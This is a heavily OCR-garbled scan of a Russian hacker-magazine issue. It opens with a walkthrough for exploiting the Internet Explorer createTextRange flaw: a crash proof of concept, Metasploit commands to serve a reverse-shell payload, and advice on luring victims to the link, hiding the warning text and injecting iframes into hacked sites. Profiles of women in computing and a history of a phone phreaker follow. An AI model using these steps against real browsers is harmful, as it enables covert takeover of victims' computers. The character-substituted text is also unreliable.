ошибка стала достойным продолжателем нашумевшего 
ѴѴМБ-Ъи§. Пройти мимо нее было бы кощунством. 



Предыстория 

22-го марта 2006-го года группой СотриіегТегоггізт ( ѵѵѵѵѵѵ.сот- 
риіеііеггогізт.сот ) из Великобритании был описан Абѵізогу СТ22- 
03-2006, в котором шла речь о серьезной проблеме в браузере М3 
ІЕ 6.0 всех сборок и бета-версии 7. Стоит заметить, что, по заяв- 
лениям СЕВТ, первым уязвимость обнаружил Андреас Санблад 
(Апбгеаз ЗапбЫаб) из Зесипіа ВезеагсИ. В довольно скудном тех- 
ническом описании указывался основной источникзла — функция 
сгеа!еТехіВапде(), которая в некоторых условиях могла привести 
к неправильному разыменовыванию таблицы указателей. Посмот- 
рим ошибочный код поближе: 

0x70530150 МОѴЕСХ, ОѴѴОВОРТВ 03:[Е0І] 

0x70530166 САШ ОѴѴОВО РТВ [ЕСХ] 

Таким образом, из-за плохо продуманной передачи данных внутри 
браузера, можно сформировать некорректную ссылку. Как следс- 
твие, регистр ЕСХ укажет на несуществующий участок кода, что 
спровоцирует вылет браузера в трубу. Тем не менее, по утвержде- 
ниям экспертов из СотриІегТегоггізт, если указатель будет пока- 
зывать в нужную сторону, то нам надо поэксплуатировать приложе- 
ние, передав управление шелл-коду, расположенному в памяти, по 
адресу ЕСХ. В качестве доказательства приводился РоС-код, на- 
глядно демонстрирующий йоЗ ІЕ, который расположен по адресу: 
ѵѵѵѵѵѵ.сотриІегІеггогізт.сот/гезеагсН/іе/рос.Ніт . Неплохо, правда? 
Подробнее почитать про ошибочную функцию ты сможешь здесь: 
НПр://Ноте.игаІ.ги/~рзѵпе1/ТехіВапае.Ніт І 

Развитие уязвимости 

Сразу же после опубликования информации о дыре вышло не- 
сколько Обау-сплоитов различных сборок. Первым человеком, ко- 
торый разработал концепцию сплоита, был хакер с ником Зкуііпеб. 
А самой нашумевшей считается версия отмычки, написанная на- 
шим соотечественником ОагкЕадІе, которую можно стянуть с Мил- 
ворма: ѵѵѵѵѵѵ.тіІѵѵ0гт.сот/ехрІоі1з/1606 . Код не слишком сложный. 
Я думаю, если немного над ним посидишь со справочником по 63, 
то белые пятна вскоре исчезнут. Вообще, у многих людей сплоит 
не выдавал желаемого результата (вшитый шелл-код должен был 
запускать виндовый калькулятор), вместо этого браузер обжирал 
жуткий кусок памяти и не по-детски грузил своп. Ходят слухи, что, 
возможно, ОЕР защищает от подобного рода уязвимости, но сей- 



час я не могу сказать тебе, так ли это. Самый примитивный экс- 
плойт, который приводит к аварийному завершению работы брау- 
зера, выглядит примерно так: 

<іпріЛ Іуре="сНескЬох" іб='с'> 

<зсгір{> 

г=боситепТдеіЕІетепіВуІб("с"); 

а=г.сгеа{еТех{Яапде(); 

</зсгірЬ 

После появления Обау-сплоита решения по ликвидации уязвимос- 
ти от самой М3 не было. Единственное, что посоветовали специ- 
алисты из Майкрософт, — это запретить выполнение активного 
содержимого. Впрочем, багфиксы последовали от сторонних 
производителей, таких как известная Юеіепсе, беіегтіпа и так да- 
лее. Насколько я знаю, фиксы представляли собой обычные 01_1_, 
которые подгружались к потенциально уязвимым приложениям ІЕ, 
ОиіІоок(аутглюк, между прочим, автоматически выполнял злобный 
скрипт, который он получал в письме, поэтому реагировал на него 
аналогично ослу). Тем не менее программисты из Майкрософт вы- 
пустили официальную заплатку для винды. Теперь она доступна 
по адресу: ѵѵѵѵѵѵ.тісгозоіІ.сотЛесНпеІ/зесигіІѵ/ВиІІеІіп/МЗОб-ОІЗ. 
тзрх . Замечу, что бюллетень был опубликован только 1 1 -го апре- 
ля. Особой чести разработчикам винды это не делает. 

Глобальное эксплуатирование 

В принципе, если тебе нравится возиться со всеми сплоитами 
вручную, то все, что тут написано, можешь смело пропустить. Но 
если ты ничего пропускать не будешь, то узнаешь, как можно мак- 
симально автоматизировать и упростить процесс использования 
нового бага. Итак, приступим. Для начала нужно качнуть с ѵѵѵѵѵѵ. 
теіазріоіі.ога последний снапшот МеІаЗрІок Егатеѵѵогк (его вер- 
сия на момент написания статьи — 2.5), там по умолчанию должен 
быть вшит новый сплоит. Небольшая поправка: комплект я качал 
и ставил под никсы. Если ты сидишь под дырявой виндой, то бери 
версию для Судѵѵіп. В том случае, если версия фрэймворка у тебя 
чуть старше, то можно просто добавить отмычку, создав в папке 
ехріоііз файл Іе_сгеаіе1:ех1:гапде.рт, который можно взять по ссыл- 
ке: ИПр://те1азрІоі1.сот/ргоіес1з/Егатеѵѵогк/тобиІез/ехрІоі1з/іе 

сгеаіеіехігапае.рт . Как видишь, все предельно просто. Запускаем 
метфреймовскую консоль ./тзісопзоіе. Проверим, отображается 
ли наш эксплойт в списке доступных командой «зііоѵѵ ехріоііз» . Он 
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Сотриіет Теітогізт ™ 

РгОІ&СШг'і *оі й ѵуІл^гйЫе 



Ехріогег ЗаѵаЗсгірі ѴѴІп^оѵ/() Ргооі о! Сопсері 



ТЪе іоі I оѵ/і пд Ргооі оі Сопсері іг ргоѵігіегі ехсіигі ѵеіуіог есіисэііопаі ригрогег 
опіу, апгі іг гиЬ^есі іо оиг гіапеіэгсі ѵѵеЬгііе Тегпіг апсі і. опсііііогіг оі иге. 

Мо*е: РоѵѵпІоасІ <Ье РаІсИегТогіЬіг ѴиІпегаЬІІІіѵ 



Зеіесі уоиг орегаііпд гугіепп:- 



Мі сгогоіі Ѵ'.ч псіоѵ/г ХР (АІІ Зегѵісе Рас кг | 
Місгогоіі ѴѴІпсІо\ѵг 2000/Упі ѵеггаі (ЗІо\ѵег) 



іпѵокег саіс.ехе іі гиссеггіиі 
(Реасі іЬе іиІІ асіѵігогу Ьеге) 



/1/ \лллл/ѵ.сотриіегіеггогізт.сот /3/ \лллллл***.сот 

страница проверки на бажность зараженная шеяя-кодом страница 

/ 2 , саіс 

страничка проверки на бажность 
загрузилась 




Прочитай про бажную функцию: 

Ніір://Иоте.игаІ.ги/~р5ѵпеі/ТехіРіапде.бітІ 
Проверься сам: 

ѵѵѵѵѵѵ.сотриіегіеггогізт.сот/гезеагсіѴіе/ 






:Ч Ѣщк іКГі ^ г сіи ал зро ш чпл-ікчрт Ъ«, и Ьбщс ш щ. ■ кп г .ТіЗ («пщ Ълщр *рт іщ са^ѵі 

Ь в ^»^йепт. У:Ш Ш ѵош ілЛ г ш а ^ г тИгЪ Ь:-«г іЬе ѴМ Я** оПЮПЗДЕ ПСЕ ^ои?р, даЬй іЬр СНГ іщк йи рос«і и тау 1^ 
ІѴсрсгг 5Л 



/3/ 



і Теперь настал самый важный момент: выбор начинки 
^ (РАУЬОАО) или, проще говоря, шелл-кода 



должен называться «іе_сгеаіеіехігапде». Если он появится в спис- 
ке, то все отлично: пишем «изеіе_сгеаіеіехігапде» и смотрим, какие 
параметры нужно задать для того, чтобы ехріоіі заработал. Обяза- 
тельным является один параметр, в котором мы указываем порт, 
где должен висеть фейковый веб-сервер с зараженной страницей. 
Делаем так: «зеі НТТРРОВТ 1234». Теперь настал самый важный 
момент: выбор начинки (РАѴІ_ОАЭ) или, проще говоря, шелл-кода. 
Во фреймворке имеется приличный список шелл-кодов под вин- 
ду, и у тебя нет необходимости каждый раз перелопачивать сорец. 
Чтобы поменять записанный шелл-код, воспользуйся прелестями 
МеіаЗрІоіі РгатеѴѴогк. Можно тупо забиндить порт, выполнить ко- 
манду по удалению Ргодгат Рііез, добавить нового пользователя 
— да все, что душе угодно! Для нашего эксперимента мы зарядим 
классическую начинку «зеі РАѴІ_ОАЭ ѵѵіп32_геѵегзе», которая со- 
единится с нашим сервантом и подключит нас к стсі.ехе с права- 
ми пользователя, имевшего неосторожность просмотреть нашу 
ссылку. Ах да, чуть не забыл: чтобы шелл-код присоединился к 
нам, а не к машине какого-нибудь Петровича, зададим обязатель- 
ный параметр «1_НОЗТ внешний_ІР-адрес_нашей_машины». Вот и 
все. Запускаем нашу адскую машину командой «ехріоіі». Если все 
о'кей, то на экране появится примерно следующее: 

[*] Зіагііпд Реѵегзе Напбіег. 

[*] ѴѴаіііпд іог соппесііопз іо Гііір://61 .65.23.45: 1 234/ 

Это значит, что все замечательно, и ссылку можно отправлять 



своим лучшим друзьям: «Оля-ля! Какая ссылка, Петрович. Зайди 
на Иіір://61 .65.23.45: 1234/ ». Только учти, что когда чел зайдет по 
линку, перед ним возникнет загогулина, как на скрине. Это не- 
много палевно, и если ты последний негодяй, желающий направо 
и налево троянить, то поправь код в самом іе_сгеаіеіехігапде.рт. 
После <ЬосІу опІоасІ="$5іагі()"> убери позорную надпись, чтобы 
она больше не смущала тебя и посетителей твоей ссылки. Как 
видишь, использование этой отмычки из комплекта фреймворка 
очень похоже на использование ѴѴМР-сплоита оттуда же. А вооб- 
ще, не обязательно так палиться и совать всем свой линк. Можно 
подпихивать ифрейм или просто вписать редирект в Іпіт 1-стра- 
ницу на похаканном сайте. Еще есть старый способ, записывай: 
ставишь ссылку в инфе о себе в аське — и айда на буржуйские 
форумы знакомиться со всеми подряд. 

Не ѴѴМР'ом единым! 

ІЕ продолжает преподносить нам сюрпризы. Причем Осел остает- 
ся одним из самых популярных браузеров, не смотря нато, что мож- 
но осоловеть, глядя на список найденных в нем уязвимостей ! Но не 
все так плохо, как кажется: патчи выпущены, поэтому обновляйся и 
будь начеку. А вообще, глядя на такой бурный ростОбау-сплоитов, 
стоит остерегаться полного беспредела в Сети, когда безбашен- 
ные киддисы скомпилируют все и вся. Мне кажется, что Осіау дол- 
жен быть приватным стаффом и обладать им должны достойные 
люди, которые готовы отвечать за свои поступки, 
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Стефани Вейнер Сандра Байлор 



Если ты мало знаешь о квантовых компьютерах, но хотел бы уз- 
нать об этом больше от грамотного специалиста, то тебе стоит 
послушать лекции Стефани Вейнер, которые она нередко читает 
на компьютерных конференциях. Стефани проходит обучение в 
институте математики и компьютерных наук СѴѴІ, в котором углуб- 
ленно изучает квантовые технологии. Эта молодая девушка уже 
успела написать несколько научных трудов о квантовых компью- 
терах, изложив новые идеи, а также поработать системным адми- 
нистратором ІІІМІХ-ведущих провайдеров Нидерландов. На извес- 
тном хакерском пати НАІ_2001 Стефани сделала доклад о взломе 
модулей ядра РгееВЗЭ. Среди ее других компьютерных интересов 
— программирование на РегІ и изучениетехнологии компьютерных 
вирусов и червей. Хотя Стефани сама еще не закончила ВУЗ, она 
уже преподает в нем, передавая студентам свои знания о кванто- 
вых компьютерах. 



В то время как школьные подруги бегали на свидания и устраивали 
шумные вечеринки, Сандра Байлор с энтузиазмом читала учебники 
поточным наукам. Девочка не понимала, какони могуттратить попусту 
время, когда в мире столько всего интересного. Во время летних кани- 
кул она подалазаявку на подготовительные компьютерные курсы при 
университете Луизиана, и полученный там опыт вдохновил Сандру на 
более подробное изучение компьютеров и инженерии. Она успешно 
поступила в университет и через несколько лет окончила его с отли- 
чием, получив через какое-то время ученые степени в Стэнфордском 
и Хьюстонском университетах. В это время ІВМ как раз нуждалась в 
квалифицированных специалистах, и ее пригласили на работу в Ис- 
следовательский центр компании, расположенный в Нью-Йорке. Там 
Сандра в составе команды ученых приступила к разработке системы 
входа/выхода (І/О) в параллельных процессорах. Такие процессоры 
обычно используют на компьютерах, где требуются сложнейшие вы- 
числения (например, при моделировании погоды или конструирова- 
нии самолетов). Основной задачей Сандры было увеличить скорость 
работы 1/0. Во время работы в ІВМ женщина получила более 1 0 патен- 
тов на свои инженерные идеи, написала десятки технических статей 
и выступила соавтором нескольких компьютерных книг. А помимо 
основной работы, Сандра состоит в нескольких известных компью- 
терных организациях, включая ІЕЕЕСотриіегЗосіеІу. 



* Помнится, около полутора лет назад, чтобы развеять миф о том, что девушек-хакеров не существует, я взял интервью у одной из 
них. Из этого интервью выяснилось, что моя собеседница не вчера села за компьютер, и познания ее не ограничиваются Вазіс’ом. 
Но Фомы неверующие нашлись и здесь, заявив мне, что интервью фейковое, а вопросы я придумал сам. Что ж, дубль два. Теперь 
я расскажу о хакершах и программистках факт, о существовании которых ты можешь запросто проверить в Интернете. Эти дамы 
удивляли даже матерых профи и выделялись на общем женском фоне своей неутолимой жаждой знаний и способностью разобрать- 
ся в сложнейших компьютерных задачах. Их имена перед тобой. 
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Сюзан Сандер Анита Джонс 



Сюзан Сандер — одна из самых известных хакерш 80-х годов. Ро- 
дилась в 1 959-м году в городе Олтон, штат Иллинойс, а когда девоч- 
ке исполнилось 8, семья перебралась в Калифорнию. Здесь, пыта- 
ясь убежать от постоянных ссор с родителями, Сюзан открыла для 
себя возможности телефонии и принялась целыми днями назва- 
нивать по случайным номерам, общаясь с незнакомыми людьми. 
С возрастом это увлечение не исчезло, а наоборот, превратилось 
в настоящую страсть. С помощью телефона Сюзан могла манипу- 
лировать людьми — у нее был приятный глубокий голос, и мужчи- 
ны были готовы на многое, чтобы встретиться с незнакомкой. Но 
только после знакомства с фрикером Роско — оператором одной 
из первых в Лос-Анджелесе линий конференц-связи НОВО-ІІРО 
— девушка взглянула на телефонные системы не как на развлече- 
ние, а как на целый электронный мир, живущий по своим законам. 
И его можно было изучать бесконечно. Со временем Сюзан, Роско, 
Кевин Митник и Стив Роудс объединились в команду, наводящую 
ужас на крупнейшие телефонные компании Америки. Сюзан тог- 
да подрабатывала в публичном доме, и все заработанные деньги 
вкладывала в технику. Компьютерные сети были не менее интерес- 
ны, чем телефонные, и девушка все свободное время уделяла их 
изучению. А по ночам сама или со своими приятелями проводила 
дерзкие взломы. К 1981-му году отношения с Роско испортились: 
они стали злостными врагами, проводя публичные разборки наха- 
керских ВВЗ, обвиняя друг друга во всех смертных грехах. Закон- 
чилось все тем, что Сюзан сдала бывших дружков-хакеров, и Роско 
пришлось отправиться за решетку. Сюзан же продолжила крутить- 
ся в компьютерном андеграунде и совершилаеще немало взломов. 
В конце 90-х годов Сюзан Сандер внезапно исчезла с хакерской 
сцены, и о том, чем она занимается сейчас, знают немногие. 



В одном из своих интервью Анита Джонс произнесла: «У меня одна 
из лучших в стране работ для ученого, который хочет влиять на мир 
науки. Я решаю, насколько перспективны те или иные исследова- 
ния, консультирую Министерство обороны по поводу вложений 
в разработке новых технологий. И ежегодный бюджет, который 
распределяется благодаря мне, — ни много ни мало 8 миллиардов 
долларов». 

В студенческие годы Анита изучала математику и получила 
ученую степень в английской литературе. После окончания 
института девушка устроилась работать программистом в не- 
большую фирму. Компьютерная область тогда была самой быс- 
тро развивающейся, и Анита Джонс верила, что эти сложные 
машины могут по-настоящему изменить мир. Вдохновленная 
этой мыслью, она решила связать с компьютерами свою жизнь, 
и немного позже защитила докторскую диссертацию в области 
компьютерных наук. В начале 70-х годов Анита стала одним из 
основателей и вице-президентом софтварной компании Тагіап 
І_аЬогаІогіез. Там она проработала 6 лет, а в 1988-м году решила 
углубленно заняться наукой и возглавила факультет компьютер- 
ных наук в университете штата Вирджиния. В 1993-м году имя 
женщины было широко известно в научных кругах, ее пригла- 
сили в Пентагон и предложили пост директора отдела Исследо- 
ваний и Инженерии. В течение своей долгой научной карьеры 
Анита Джонс участвовала во многих компьютерных проектах, 
она написала несколько систем защиты, мультипроцессорную 
операционную систему и множество прикладных программ. А 
сейчас ее внимание направлено на изучение информационных 
систем, используемых в экстремальных условиях, и разработку 
интерактивных симуляторов. 
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Г рейс Хоппер Джин Саммет 



В 40-е годы женщины в военно-морском флоте США были редко- 
стью. Еще реже они встречались там, где требовалисьтехнические 
знания. Но Г рейс Хоппер это не смущало: она с детства увлекалась 
числами, получила ученую степень по математике и совершенно 
былауверена, что за этими большими машинами, мигающими все- 
ми лампами, — будущее. В 1945-м году, после развода со своим 
мужем , она подал а заявку на флот, где ее определили в исследова- 
тельское военное бюро при Гарвардском университете. Там пер- 
выми задачами Грейс было определение оптимальной дистанции 
выстрела орудий, а для проведения расчетов в ее распоряжении 
находился Магк I — компьютерный монстр, построенный ІВМ для 
военных нужд. Для Г рейс, которая с детства питала любовь ко вся- 
ким гаджетам, компьютер, занимающий целую комнату, казался 
настоящим чудом. Она большую часть времени проводила за Магк 
I и вскоре освоила его в совершенстве, занимаясь написанием 
первых программ и документаций для этой машины. В 1946-м году 
женщина оставила службу на флоте и полностью посвятила себя 
компьютерам серии Магк. Г рейс продолжала заниматься програм- 
мированием и продвигала свои идеи насчет возможных примене- 
ний компьютеров в бизнесе и других сферах. Ее работы заметили, 
и чуть позже Ескегі-МаисЫуСотриІег — компания, разрабатываю- 
щая принципиально новый мейнфрейм ІІІМІѴАС I, — предложилаей 
должность математика. Там Г рейс разработала первый в истории 
компилятор «А-0», а вернувшись в 1949-м году на флот, приступи- 
ла к написанию языка программирования СОВОІ_ — прародителя 
всех современных языков высокого уровня. 

В 1 986-м году, в возрасте 79-ти лет, Г рейс Хоппер окончатель- 
но оставила флот в должности адмирала, но даже после этого не 
ушла на покой, а продолжила работать в компьютерной сфере и 
выступать с лекциями по всему миру. 



После того как Джин Саммет окончила на отлично факультет ма- 
тематики в университете Иллинойса, перед ней открылись двери в 
различные научные организации мира. Но Джин решила продолжить 
обучение, а через несколько лет устроилась на работу в компанию 
Меігороіііап І_іІе Іпзигапсе. Значительную часть времени ей приходи- 
лось проводитьзаогромными мейнфреймами, выбивая программы на 
перфокартах. В 1 953-м году, когда Джин занималась математическим 
анализом в компании Зреггу (Зугозсоре, руководитель предложил ей 
поработать программистом для нового цифрового компьютера, раз- 
работанного местными инженерами. Что именно нужно было делать, 
ни Джин, ни босс не знали, но у женщины имелся опыт работы с ком- 
пьютерами, и они вызывали у нее большой интерес. Впоследствии 
Джин не только приняла активное участие в разработке программ для 
сконструированной машины , но благодаря ей в Зреггу (Зугозсоре поя- 
вилась научная компьютерная группа. А в свободное от работы время 
Джин читала в колледже лекции о программировании. Чтобы достичь 
большего в своей карьере, она со временем оставила 3(3 и заняла 
высокооплачиваемую должность в крупной компьютерной компании 
Зуіѵапіа Еіесігіс РгобисГз, где занималась анализом развития ПО для 
военных компьютеров МОВЮІС. Но и на этом не остановилась. Жен- 
щина руководила бостонским отделом программирования, а круп- 
нейшим ее проектом стал РОВМАС — первый широко используемый 
язык программирования для решения символьных математических 
задач. В 1 965-м году Джин Саммет переходит в отдел системных раз- 
работок ІВМ и в рамках своей работы пишет объемную (785 страниц) 
книгу «Языки программирования: история и основы». Эта книга ста- 
нет классикой компьютерной литературы. Джин также принимала 
участие в разработке языка «Ада» и многих других проектах ІВМ, а в 
1988-м году вышла на заслуженный отдых, периодически давая кон- 
сультации по техническим вопросам. 
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Рена Тенгенс 



Неточка Незванова 



В 1987 году Рена стала полноценным мембером германско- 
го хакерского клуба «Хаос». Она, как и многие ее знакомые 
компьютерщики, была под впечатлением от возможностей 
компьютерных коммуникаций, и изучала всю информацию, 
которую могла достать на ВВЗ и взломанных компьютерах на- 
учных организаций. Рена принимала участие в жизни хакер- 
ского андеграунда Германии, основала популярную Віопіс 
ВВЗ, участвовала в создании 7,-ЫеХт. и СІ_ (сети объединенных 
электронных борд), а также национальной сети 2атіг, пост- 
роенной в 1992-м году во время войны в Югославии. Рена не 
только использовала ВВЗ, но и сама писала для них програм- 
мы. Например, сделала большой вклад в развитии ВВЗ-сис- 
темы 2егЬешз. В начале 90-х годов Тенгенс увлеклась крип- 
тографией и опубликовала первый мануал на немецком языке 
по РОР. В 2000-м году постоянная посетительница хакерских 
и зесигііу-конференций стала одним из организаторов и чле- 
ном жюри Від ВгоіИег Аѵѵагбз — ежегодной премии, вручаемой 
самым «дотошным» комитетам по надзору. Одновременно со 
своей активной социальной жизнью Рена работает над раз- 
нообразными техническими проектами в ассоциации РоеВіЮ, 
основателем которой она была в 80-х годах. Одной из ее не- 
давних разработок стал ОаіаРгіѵаІігег — система для обнару- 
жения спрятанных НРЮ-чипов и сканеров. 



Девушка, которая позже выберет себе псевдоним в честь героини 
Достоевского, родилась в Минске в 1 977-м году. Дальше переехала 
в Новую Зеландию, где изучала физику в университете Виктория. 
А окончив ВУЗ, попросту исчезла. Друзья говорили, что она всерь- 
ез увлеклась компьютерами и окунулась в андеграунд. В середине 
90-х на электронных досках и конференциях ІІзепеЦ посвященных 
электронной музыке, искусству и программированию, появились 
сообщения от Неточки. Она регулярно постила длинные тексты, на- 
писанные на английском, французском, немецком и других языках, 
включая в них АЗСІІ-изображения. Большая часть ее постов носили 
скандальный и высокомерный характер, и вскоре вокруг ее имени 
появилась целая легенда. Подписчики считали, что никакой Неточки 
на самом деле не существует, что это всего лишь виртуал, создан- 
ный для того, чтобы развлечься в Сети. Как было на самом деле, 
никто не знал: девушка о себе ничего не сообщала, и выследить 
ее не представлялось возможным. В конце концов ее забанили на 
центровых местах общения технарей, но это не прекратило шумиху 
вокруг этой особы. Неточка написала несколько программ, самой 
известной из которых стала паІо.0+55, расширяющая возможности 
пакета программирования графики МАХ. Эту и другие ее утилиты 
использовали в работе многие художники и аниматоры. В конце 90-х 
Неточка завоевала несколько программерских наград и стала учас- 
тницей списка «25 самых выдающихся женщин Сети» , составленно- 
го некоммерческой организацией из Сан-Франциско. 



НЕТОЧКА НАПИСАЛА НЕСКОЛЬКО ПРОГРАММ, САМОЙ ИЗВЕСТНОЙ ИЗ КОТО 
РЫХ СТАЛА ЫАТО.О+55, РАСШИРЯЮЩАЯ ВОЗМОЖНОСТИ ПАКЕТА ПРОГРАМ 
МИРОВАНИЯ ГРАФИКИ В ЗО ЗТІЮІО МАХ 
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Сцена / 02 

Блуждающий 

фрикер 

История РебВохСЬШРеррег и РГюпе Ьозегз оі Атегіса 



Каждый, кто хоть немного интересо- 
вался фрикингом, наверняка встречал 
аббревиатуру РІА — РЬопе Ьозегз оі 
Атегіса. Двенадцать лет назад на амери- 
канских ВВ8 стали появляться егіп’ы от 
«Телефонных неудачников Америки», 
содержащие статьи о фрикинге, пран- 
ке, хаке, западлостроении, а зачастую 
просто юмористического содержания. 

В середине и конце 90-х РІА был одним 
из самых известных лейблов в американ- 
ском компьютерном андеграунде . 



РІ.А 

Многие считают, что РИопе І_озегз оі Атегіса — это фрикерская 
группа. Это не совсем так. РІ_А никогда не была группой как тако- 
вой: под этим названием лишь выпускался е-гіпе, который писал 
парень с ником РебВохСИШРеррег вместе со своими друзьями, та- 
кими же фриками, как и он. Позднее, когда журнал уже прекратил 
свое существование, аббревиатура РІ_А не исчезла — она стала 
названием сообщества, сформировавшегося среди читателей 
РІ_А гіпе и объединяющего огромное количество фрикеров или 
просто приколистов-пранкеров по всей Северной Америке: от 
Аляски до Калифорнии. Основателем РИопе І_озегз оі Атегіса 
можно по праву считать Брэда Картера ака РебВохСИіІіРеррег, ко- 
торый на протяжении всей истории существования журнала был 
его бессменным редактором и написал большинство статей. Сам 
Брэд называет основателем не себя, а своего друга Зака, более 
известного как еЦеІе, который придумал название РИопе І_озегз оі 
Атегіса и помогал Брэду создавать зайн. Но наибольший вклад в 
развитие РБАвнесвсеже ВебВохСЫІіРеррег (далее просто РВСР). 



Детство фрикера 

Брэд хотел стать хакером еще с детства. Как и у многих других мо- 
лодых ребят, это желание появилось у него в результате просмот- 
ра фильма «Военные игры». Дома у Бреда был компьютер Тітех 
Зіпсіаіг 1000 (приставка к телевизору, использующая магнитофон 
в качестве привода), и юный Картер проводил за ним кучу времени. 
Увидев однажды в каталоге расширение для своего компьютера 
— модем, он загорелся идеей подключить его к своей машине и 
стал активно копить деньги. Но когда отец спросил, зачем ему эта 
вещь, Брэд не нашел, что ответить. Тогда он еще даже не догады- 
вался о существовании ВВЗ. 

Вторым компьютером Брэда был Арріе II, находившийся в об- 
щественной библиотеке, расположенной прямо напротив его шко- 
лы. Парень мог целыми днями торчать в хранилище книг, сидя за 
компьютером, который был на несколько порядков круче его собс- 
твенного. Вскоре на собранные деньги Брэд приобретает машину 
ТВЗ-80, которая вполне успешно конкурировала с компьютерами 
Арріе. К этому времени Картер втянулся в модное развлечение 
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под названием пранк. Используя телефон, он разыгрывает своих 
друзей, школьных учителей или просто людей, ответивших по слу- 
чайно набранному номеру. Брэд научил свой ТВ5-80, имеющий на 
борту простенький звуковой синтезатор, говорить электронным 
голосом, а именно : делать заказ пиццы по телефону. Звонил дру- 
зьям, представляясь военным суперкомпьютером, и вытворял кучу 
других веселых глупостей. 

В 1989-м году, когда Брэду уже исполнилось 16 лет, директор 
кинотеатра, в котором он подрабатывал, решил заменить имею- 
щиеся там компьютеры на новомодные факс-машины. Парню уда- 
лось выкупить за $300 подержанный Тапбу 1 000ЕХ, но главное — в 
комплекте к нему шел модем! Собрав дома это чудо, он принял- 
ся названивать в компьютерную фирму РІаіо'з Сотриіегз, прося 
о том, чтобы ему выдали номера общедоступных ВВЗ'ок. С этого 
началось его сильное увлечение бордами. 

Первым делом в тусовке компьютерного андеграунда нужно 
было выбрать ник. Брэд был большим любителем рок-музыки, поэ- 
тому его первое сетевое прозвище звучало как ѴапНаІепРап. Поз- 



же любимой группой стала ВесІНоЮЫІіРеррегз, а вместе с музы- 
кальными предпочтениями сменился и ник — ВебВохСИШРеррег. 
Как и многие другие компьютерщики, на фоне увлечения блу- и 
редбоксами, Брэд стал экспериментировать с различными теле- 
фонными девайсами. Его первым РебВох'ом был обычный плеер 
с кассетой, на которую РВСР записал сигналы для совершения 
бесплатных звонков. Юный фрикер юзал его целый год, пока один 
приятель не показал ему статью из легендарного 2600 тадагіпе, в 
которой рассказывалось, как собрать «настоящий» редбокс. Поз- 
же эта статья, дополненная Брэдом, станет вторым выпуском РІ_А. 

Скитания по Америке 

В 1991-м году Брэд заканчивает школу, которую он попросту тер- 
петь не мог, и решает покинуть свой дом в Иллинойсе. С этого мо- 
мента у РВСР начнется кочевая жизнь, которая продлится вплоть 
до 1998-го года. Именно в этот период своей жизни парень станет 
знаменитым на всю страну фрикером, тогда же Р1_А превратится 
в целое движение, объединившее фрикеров по всей Америке и 
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РесІНоіСЫІіРеррег 



Канаде. Брэд собирает необходимые ему в пути вещи и уезжает 
прочь на своем стареньком авто — Эосіде СоІІ 79-го года. Он на- 
правляется в Гальвестон Айленд в Техасе, где работает на различ- 
ных мелких работах, ночует в автомобиле, посещает за небольшую 
плату кампус местного колледжа, где есть компьютеры и другие 
развлечения. Обычно он путешествуете друзьями, с которыми зна- 
комится во время своих странствий по Штатам. Парни вовсю раз- 
влекаются пранком, телефонными хаками и другими подобными 
вещами. Через некоторое время Брэд знакомится с девушкой по 
имени Сильвия, которая станетего спутницей на целый год. Движок 
его старенькой тачки ктому времени совсем сдох, и он продолжает 
свои путешествия автобусами и авиарейсами. Вместе с Сильвией 
они «гостят» по нескольку месяцев то у друзей, то у родителей, пе- 
риодически останавливаясь в отелях или даже заброшенных зда- 
ниях. При любой представившейся возможности Брэд посещает 
ВВЗ, внимательно изучая скачанные хакерские и фрикерские ма- 
нуалы. Обычно лучшим местом для серфа по бордам оказывались 
библиотеки университетов или колледжей, где имелись компью- 
теры с модемом. Вдохновленный прочитанной инфой, РВСР и сам 
стал писать небольшие статьи по хаку и фрику, вкладывая в них 
собственный опыт. Эти тексты станут первыми выпусками Р1_А. 

Вплоть до января 1993-го года фрикер перемещался из города 
в город: от Хьюстона до Лос-Анжелеса. И всюду его сопровождала 
Сильвия. Пользуясь своими компьютерными знаниями, Брэд помог 
девушке найти мать, с которой та не виделась с пятилетнего воз- 
раста. И вот после долгих скитаний влюбленные останавливаются 
в местечке под названием Г альвестон Айленд, где умудряются по- 
терять друг друга. Не получив никаких известий о Сильвии в тече- 
ние нескольких дней, Брэд покупает билет на самолет, летящий в 
Майами, и проводит там весь февраль, ночуя в районе городского 
пляжа. А на следующий месяц возвращается домой в Ист Элтон. 
1-го апреля Брэд внезапно получил звонок от Сильвии, которая 
сообщила, что утром вылетает к нему. После радостной встречи 
девушка предложила ограбить магазинчик ѴѴооб Ріѵег 7-ЕІеѵеп, в 
который Картер устроился незадолго до этого, удрать на восточ- 
ное побережье и жить там под вымышленными именами. Идея была 
совершенно бредовая, но именно так они и поступили. 

РВСР любил сохранять информацию обо всем, чем занимался. 
У него была коллекция многотысячных неоплаченных телефон- 
ных счетов, скарженных авиабилетов, он записывал на кассеты 
все свои пранки. Так как он знал, что в комнате управляющего все 
происходящее в магазине записывается на пленку, Брэд решил 
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захватить кассету с записью ограбления с собой. И когда проник в 
эту самую комнату, совершенно случайно обнаружил там ключ от 
сейфа. В общем, молодые грабители поживились неплохо — $4000 
наличными и куча всякой мелочевки. Сменив по дороге в аэропорт 
два такси, они купили билеты и стали ожидать своего рейса. По- 
лиция арестовала их за час до вылета. Наказанием за это пре- 
ступление стала неделя, проведенная в тюрьме, после чего Брэда 
выпустили, но он был обязан появляться в участке до проведения 
окончательного слушания его дела в суде. 

В следующем месяце у РВСР вновь случился конфликт с по- 
лицией. Вместе с Сильвией и еще несколькими друзьями Брэд 
подключился к чужой телефонной линии и стал прикалываться 
над жителями города, названивая им и разыгрывая сцены. Но по 
неосторожности одного из приятелей, компанию выследили. На 
следующий день в местной газете на первой странице появилась 
статья о банде хулиганов, терроризирующих город. Так что больше 
в Хайленде, где Брэд некоторое время работал няней, работу им 
найти не светило. После этого неприятного эпизода Брэд и Силь- 
вия расстались. РВСР, несмотря на запрет суда, решает оставить 
Иллинойс и перебирается в Индианаполис, штат Индиана, где про- 
водит большую часть времени на территории местного колледжа 
под видом студента. Там он снова получил доступ к ВВ8, продолжил 
оттачивать фрикерское мастерство и взял себе новое имя — Г лен 
Карбон. 

Чтобы снова не попасться в руки полиции, фрикер прекраща- 
ет все контакты со своими прошлыми друзьями, за исключением 
еЦеІе. Но даже лучшему другу РВСР не говорит, где находится. 
Работая на автостоянке, Брэд стал собирать номера кредиток ее 
клиентов, имена владельцев. Кроме того, он делал копии ключей 
автомобилей, намереваясь в один прекрасный день смыться на 
угнанном авто. Но в итоге решил для себя, что впредь не будет за- 
ниматься ничем противозаконным (как оказалось впоследствии, 
долго он не выдержал). Собрал вещи и уехал на автобусе в Огайо, 
